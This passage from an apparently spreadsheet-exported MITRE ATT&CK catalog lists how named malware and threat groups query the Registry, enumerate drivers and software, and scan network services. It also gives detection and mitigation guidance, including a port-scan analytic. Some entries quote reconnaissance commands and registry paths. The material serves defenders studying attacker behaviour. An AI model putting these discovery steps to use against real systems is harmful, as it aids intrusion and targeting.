A variant of [HOPLIGHT](https://attack.mitre.org/software/S0376) hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key &lt;code&gt;SYSTEM\CurrentControlSet\Control\Lsa Name&lt;/code&gt;.(Citation: US-CERT HOPLIGHT Apr 2019)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) has a data wiper component that enumerates keys in the Registry &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.(Citation: ESET Industroyer)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate Registry values, keys, and data.(Citation: ESET InvisiMole June 2018)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can enumerate Registry keys.(Citation: Microsoft PLATINUM April 2016)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) can query the Registry to check for the presence of &lt;code&gt;HKCU\Software\KasperskyLab&lt;/code&gt;.(Citation: ESET Dukes October 2019)
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can query the Registry for keys added to execute COM hijacking.(Citation: Kaspersky WIRTE November 2021)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can check for existing stratum cryptomining information in &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can enumerate Registry keys with all subkeys and values.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
Milan
[Milan](https://attack.mitre.org/software/S1015) can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.(Citation: Accenture Lyceum Targets November 2021)
Mori
[Mori](https://attack.mitre.org/software/S1047) can read data from the Registry including from `HKLM\Software\NFC\IPA` and
`HKLM\Software\NFC\`.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) queries the registry to look for information about Terminal Services.(Citation: Symantec Buckeye)
POWERSOURCE
[POWERSOURCE](https://attack.mitre.org/software/S0145) queries Registry keys in preparation for setting Run keys to achieve persistence.(Citation: Cisco DNSMessenger March 2017)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may query the Registry by running &lt;code&gt;reg query&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) can search the registry files of a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has used shellcode which reads code stored in the registry keys &lt;code&gt;\REGISTRY\SOFTWARE\Microsoft\DRM&lt;/code&gt; using the native Windows API as well as read &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces&lt;/code&gt; as part of its C2.(Citation: Trustwave Pillowmint June 2020)	
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can enumerate and query for information contained within the Windows Registry.(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) gathers product names from the Registry key: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName&lt;/code&gt; and the processor description from the Registry key &lt;code&gt;HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString&lt;/code&gt;.(Citation: McAfee GhostSecret)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.(Citation: Unit 42 QUADAGENT July 2018)
QUIETCANARY
[QUIETCANARY](https://attack.mitre.org/software/S1076) has the ability to retrieve information from the Registry.(Citation: Mandiant Suspected Turla Campaign February 2023)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) uses the command &lt;code&gt;reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”&lt;/code&gt;.(Citation: RATANKBA)
REvil
[REvil](https://attack.mitre.org/software/S0496) can query the Registry to get random file extensions to append to encrypted files.(Citation: Secureworks REvil September 2019)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can access the &lt;code&gt;HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData&lt;/code&gt; Registry key to obtain the System manufacturer value to identify the machine type.(Citation: Talos Group123)
Reaver
[Reaver](https://attack.mitre.org/software/S0172) queries the Registry to determine the correct Startup path to use for persistence.(Citation: Palo Alto Reaver Nov 2017)
Reg
[Reg](https://attack.mitre.org/software/S0075) may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.(Citation: Microsoft Reg)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\MICROSOFT\Windows NT\ CurrentVersion | ProductName`.(Citation: McAfee Sharpshooter December 2018)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use the `GetRegValue` function to check Registry keys within `HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.(Citation: GitHub SILENTTRINITY Modules July 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) collected the registry value &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid&lt;/code&gt; from compromised hosts.(Citation: FireEye SUNBURST Backdoor December 2020)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can search for the `HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System` Registry key to gather system information.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used `check_registry_keys` as part of its environmental checks.(Citation: Malwarebytes Saint Bot April 2021)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) queries several Registry keys to identify hard disk partitions to overwrite.(Citation: Palo Alto Shamoon Nov 2016)
Shark
[Shark](https://attack.mitre.org/software/S1019) can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.(Citation: Accenture Lyceum Targets November 2021)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has queried the registry for proxy server information.(Citation: MSTIC NOBELIUM Mar 2021)
SodaMaster
[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to query the Registry to detect a key specific to VMware.(Citation: Securelist APT10 March 2021)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) has looked in the registry to find the default browser path.(Citation: Kaspersky StoneDrill 2017)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) searches the Registry for indicators of security programs.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) enumerates Registry keys associated with event logs.(Citation: SecureList SynAck Doppelgänging May 2018)
TEARDROP
[TEARDROP](https://attack.mitre.org/software/S0560) checked that &lt;code&gt;HKU\SOFTWARE\Microsoft\CTF&lt;/code&gt; existed before decoding its embedded payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021) 
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) can query the Registry on compromised hosts using &lt;code&gt;RegQueryValueExA&lt;/code&gt;.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) can query the Registry for its configuration information.(Citation: Talos TinyTurla September 2021)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can query the Registry, typically `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds`, to find the key and path to decrypt and load its kernel driver and kernel driver loader.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used [Reg](https://attack.mitre.org/software/S0075) to query the Registry for installed programs.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)
Valak
[Valak](https://attack.mitre.org/software/S0476) can use the Registry for code updates and to collect credentials.(Citation: Unit 42 Valak July 2020)
Volgmer
[Volgmer](https://attack.mitre.org/software/S0180) checks the system for certain Registry keys.(Citation: US-CERT Volgmer 2 Nov 2017)
WINDSHIELD
[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather Registry values.(Citation: FireEye APT32 May 2017)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) checks for specific registry keys related to the &lt;code&gt;UCOMIEnumConnections&lt;/code&gt; and &lt;code&gt;IActiveScriptParseProcedure32&lt;/code&gt; interfaces.(Citation: NCC Group WastedLocker June 2020)
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) can query the Registry key &lt;code&gt;"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI"&lt;/code&gt; to see if the value `OracleOcilib` exists.(Citation: Trend Micro Waterbear December 2019)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can search registry keys to identify antivirus programs on an compromised host.(Citation: MalwareBytes WoodyRAT Aug 2022)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) executes the &lt;code&gt;reg query&lt;/code&gt; command to obtain information in the Registry.(Citation: ESET Zebrocy May 2019)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) checks for the existence of a Registry key and if it contains certain values.(Citation: GDATA Zeus Panda June 2017)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can query the netsvc group value data located in the svchost group Registry key.(Citation: Talos ZxShell Oct 2014) 
ZxxZ
[ZxxZ](https://attack.mitre.org/software/S1013) can search the registry of a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) has checked for the existence of a Service key to determine if it has already been installed on the system.(Citation: Gh0stRAT ATT March 2019)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) can read specific registry values.(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands (`lsmod`, `driverquery`, etc.) with arguments highlighting potentially malicious attempts to enumerate device drivers.
OS API Execution
Monitor for API calls (such as `EnumDeviceDrivers()`) that may attempt to gather information about local device drivers.
Process Creation
Monitor processes (`lsmod`, `driverquery.exe`, etc.) for events that may highlight potentially malicious attempts to enumerate device drivers.
Windows Registry Key Access
Monitor for attempts to access information stored in the Registry about devices and their associated drivers, such as values under `HKLM\SYSTEM\CurrentControlSet\Services` and `HKLM\SYSTEM\CurrentControlSet\HardwareProfiles`.(Citation: Microsoft Registry Drivers)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) can enumerate device drivers located in the registry at `HKLM\Software\WBEM\WDM`.(Citation: US-CERT HOPLIGHT Apr 2019)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) has a plugin to detect active drivers of some security products.(Citation: Kaspersky ProjectSauron Technical Analysis)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.
Firewall Enumeration
Monitor for an extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)
Firewall Metadata
Monitor for contextual data about a firewall and activity around it such as name, policy, or status
OS API Execution
Monitor for API calls that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.
Process Creation
Monitor newly executed processes that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.(Citation: Cylance Dust Storm)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected a list of installed software on the infected system.(Citation: FoxIT Wocao December 2019)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used tools to enumerate software installed on an infected host.(Citation: Trend Micro Tick November 2019)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has enumerated programs installed on an infected machine.(Citation: Kaspersky Lyceum October 2021)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has enumerated installed software on compromised systems.(Citation: Symantec Inception Framework March 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used a PowerShell backdoor to check for Skype connectivity on the target machine.(Citation: Trend Micro Muddy Water March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has searched the victim system for the &lt;code&gt;InstallUtil.exe&lt;/code&gt; program and its version.(Citation: Anomali MUSTANG PANDA October 2019)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has collected browser information from a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to enumerate software installed on an infected host.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor could list the infected system's installed software.(Citation: TrendMicro Tropic Trooper May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has queried the Registry on compromised systems for information on installed software.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has used a script to detect installed software on targeted systems.(Citation: ESET ForSSHe December 2018)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify installed software.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized the PowerShell script `Get-DataInfo.ps1` to collect installed backup software information from a compromised machine.(Citation: Mandiant FIN12 Oct 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can query the Registry for installed applications.(Citation: Cybereason Bazar July 2020)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can list the installed applications on a compromised host.(Citation: Check Point APT35 CharmPower January 2022)
Cobalt Strike
The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can discover applications through the browser and identify the version of Java the target has.(Citation: Cobalt Strike Manual 4.3 November 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has collected a list of installed software on the system.(Citation: Checkpoint Dridex Jan 2021)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths&lt;/code&gt; registry key.(Citation: Carbon Black HotCroissant April 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can collect information about installed software used by specific users, software executed on user login, and software executed by each system.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can collect information on installed applications.(Citation: Cybereason Kimsuky November 2020)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can check for the Telegram installation directory by enumerating the files on disk.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has searched the compromised system for banking applications.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019)
Orz
[Orz](https://attack.mitre.org/software/S0229) can gather the victim's Internet Explorer version.(Citation: Proofpoint Leviathan Oct 2017)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can list PHP server configuration details.(Citation: ANSSI Sandworm January 2021)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can enumerate a list of installed programs.(Citation: Group IB Ransomware September 2020)
RTM
[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042) can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.(Citation: Mandiant UNC3890 Aug 2022)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can collect a list of installed software from an infected host.(Citation: HP SVCReady Jun 2022)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) searches for the kubectl binary.(Citation: Unit 42 Siloscape Jun 2021)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) can enumerate running software on a targeted system.(Citation: Secureworks GOLD KINGSWOOD September 2018)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can collect .NET, PowerShell, and Python information from an infected host.(Citation: MalwareBytes WoodyRAT Aug 2022)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses &lt;code&gt;ps aux&lt;/code&gt; with the &lt;code&gt;grep&lt;/code&gt; command to enumerate common browsers and system processes potentially impacting [XCSSET](https://attack.mitre.org/software/S0658)'s exfiltration capabilities.(Citation: trendmicro xcsset xcode project 2020)
down_new
[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Enumeration
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.
Command Execution
Monitor executed commands and arguments that may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation.
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. It should be noted that when a host/ port/ service scan is performed from a compromised machine, a single machine makes multiple calls to other hosts in the network to identify live hosts and services.
After compromising an initial machine, adversaries commonly attempt to laterally move across the network. The first step to attempt the [Lateral Movement](https://attack.mitre.org/tactics/TA0008) often involves conducting host identification, port and service scans on the internal network via the compromised machine using tools such as Nmap, Cobalt Strike, etc.
&lt;h4&gt;Analytic 1 - Identifying Port Scanning Activity&lt;/h4&gt;
&lt;code&gt;flow = filter flow where (src_type = “firewall_logs” AND dest_ip = “internal_subnet” ) &lt;/code&gt;
Disable or Remove Feature or Program
Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.
Network Intrusion Prevention
Use network intrusion detection/prevention systems to detect and prevent remote service scans.
Network Segmentation
Ensure proper network segmentation is followed to protect critical servers and devices.
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used the SoftPerfect Network Scanner for network scanning.(Citation: Cisco Talos Avos Jun 2022)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), used RustScan to scan for open ports on targeted ESXi appliances.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors employed nmap and pscan to scan target environments.(Citation: BlackBerry CostaRicto November 2020) 
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.(Citation: FoxIT Wocao December 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.(Citation: Cybereason Cobalt Kitty 2017)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used [CrackMapExec](https://attack.mitre.org/software/S0488) and a custom port scanner known as BLUETORCH for network scanning.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.(Citation: ESET BackdoorDiplomacy Jun 2021)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used the SNScan tool to find other potential targets on victim networks.(Citation: Symantec Palmerworm Sep 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used the &lt;code&gt;get -b &lt;start ip&gt; -e &lt;end ip&gt; -p&lt;/code&gt; command for network scanning as well as a custom Python tool  packed into a Windows executable named Get.exe to scan IP ranges for HTTP.(Citation: NCC Group Chimera January 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) performed port scanning to obtain the list of active services.(Citation: Securelist DarkVishnya Dec 2018)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized `nmap` for reconnaissance efforts. [FIN13](https://attack.mitre.org/groups/G1016) has also scanned for internal MS-SQL servers in a compromised network.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.(Citation: FireEye FIN6 April 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used tools including NMAP to conduct broad scanning to identify open ports.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.(Citation: Kaspersky ThreatNeedle Feb 2021)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) scanned network services to search for vulnerabilities in the victim system.(Citation: Symantec Leafminer July 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning.(Citation: DFIR Phosphorus November 2021)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used the LadonGo scanner to scan target networks.(Citation: Bitdefender Naikon April 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.(Citation: FireEye APT34 Webinar Dec 2017)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.(Citation: Talos Rocke August 2018)(Citation: Anomali Rocke March 2019)
Suckfly
[Suckfly](https://attack.mitre.org/groups/G0039) the victim's internal network for hosts with ports 8080, 5900, and 40 open.(Citation: Symantec Suckfly May 2016)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used masscan to search for open Docker API ports and Kubernetes clusters.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Cisco Talos Intelligence Group) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.(Citation: Palo Alto Black-T October 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use the Hunter tool to conduct network service discovery for vulnerable systems.(Citation: Dell TG-3390)(Citation: Unit42 Emissary Panda May 2019)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;pr&lt;/code&gt; and an openly available tool to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used tcping.exe, similar to [Ping](https://attack.mitre.org/software/S0097), to probe port status on systems of interest.(Citation: PWC Cloud Hopper Technical Annex April 2017)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can check for open ports on a computer by establishing a TCP connection.(Citation: BitDefender BADHATCH Mar 2021)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can use a network scanning module to identify ICS-related ports.(Citation: Gigamon Berserk Bear October 2021)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has conducted port scans on a host.(Citation: Securelist BlackEnergy Nov 2014)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can conduct port scanning against targeted systems.(Citation: Palo Alto Brute Ratel July 2022)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a port scanner on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) 
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component can spider authentication portals.(Citation: FireEye Periscope March 2018)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform port scans from an infected host.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) scans for other machines to infect.(Citation: SANS Conficker)
Empire
[Empire](https://attack.mitre.org/software/S0363) can perform port scans from an infected host.(Citation: Github PowerShell Empire)
HDoor
[HDoor](https://attack.mitre.org/software/S0061) scans to identify open ports on the victim.(Citation: Baumgartner Naikon 2015)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to scan ports on a compromised network.(Citation: ESET Hermetic Wizard March 2022)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to look for kubelets in the internal Kubernetes network.(Citation: Unit 42 Hildegard Malware)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) uses a custom port scanner to map out a network.(Citation: ESET Industroyer)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can scan the network for open ports and vulnerable instances of RDP and SMB protocols.(Citation: ESET InvisiMole June 2020)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can scan for open TCP ports on the target network.(Citation: Github Koadic)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can scan for open ports including TCP ports 135 and 1433.(Citation: Unit 42 Lucifer June 2020)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to scan for open ports on hosts in a connected network.(Citation: FireEye Periscope March 2018)
NBTscan
[NBTscan](https://attack.mitre.org/software/S0590) can be used to scan IP networks.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can scan networks for open ports and listening services.(Citation: ANSSI Sandworm January 2021)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can initiate a port scan against a given IP address.(Citation: Peirates GitHub)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can perform port scans from an infected host.(Citation: GitHub PoshC2)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) has a built-in module for port scanning.(Citation: GitHub Pupy)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced Port Scanner tool.(Citation: CERT-FR PYSA April 2020)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
Remsec
[Remsec](https://attack.mitre.org/software/S0125) has a plugin that can perform ARP scanning as well as port scanning.(Citation: Kaspersky ProjectSauron Technical Analysis)
Royal
[Royal](https://attack.mitre.org/software/S1073) can scan the network interfaces of targeted systems.(Citation: Cybereason Royal December 2022)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can scan for open ports on a compromised machine.(Citation: GitHub SILENTTRINITY Modules July 2019)
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) checks for availability of specific ports on servers.(Citation: CheckPoint SpeakUp Feb 2019)
XTunnel
[XTunnel](https://attack.mitre.org/software/S0117) is capable of probing the network for open ports.(Citation: Invincea XTunnel)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can perform port scanning of TCP and UDP ports.(Citation: Unit42 Xbash Sept 2018)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can launch port scans.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.
OS API Execution
